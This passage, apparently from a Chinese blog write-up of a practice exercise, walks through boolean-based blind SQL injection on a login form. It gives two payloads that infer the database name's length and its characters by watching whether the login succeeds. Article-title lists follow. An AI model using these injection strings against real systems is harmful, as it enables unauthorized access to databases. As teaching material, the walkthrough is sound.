错误不回显了

构造永真登陆

登陆成功了

虽然登陆成功了，但是数据库的数据还么有爆出来

构造一下用户名

1' or length(database())=8#

如果数据库名的长度不等于8，登陆会失败

猜测数据库名第一个字符是否为's'，是则登陆成功

1' or ascii(substr(database(),1,1))=115#

最新文章

1. dubbox 增加google-gprc/protobuf支持
2. Linux内核开机保留大块内存的方法
3. C语言输入多组问题~ungetc回退字符到stdin
4. IOS详解TableView——内置刷新，EGO，以及搜索显示控制器
5. dedecms首页怎么调用公司简介的内容
6. 教程-delphi的开源json库：superobject，用法简介
7. bower初接触
8. SilkTest高级进阶系列10 – bitmap工具bitview
9. [每日一题] OCP1z0-047 :2013-07-29 视图――别名
10. flex日期合并与拆分
11. linux_硬件信息
12. Python——Pyqt5（界面）——基本设置
13. Hive 本地调试方法
14. 带拦截器配置的 struts.xml文件
15. 【NMS与IOU代码】
16. Kotlin语言学习笔记（1）
17. 简述一下 src 与 href 的区别
18. Hashtable的应用
19. Java8系列之重新认识HashMap（转）
20. Unity官方实例教程 Roll-a-Ball

热门文章

1. The merchant
2. .Net操作Excel —— NPOI
3. Linux下diff与patch命令的配合使用
4. H - Seek the Name, Seek the Fame
5. HDU 4526
6. QT中使用高速排序
7. JDK框架简析--java.lang包中的基础类库、基础数据类型
8. Android重力感应器Sensor编程
9. 【POJ 3740】 Easy Finding
10. [SDOI2007]游戏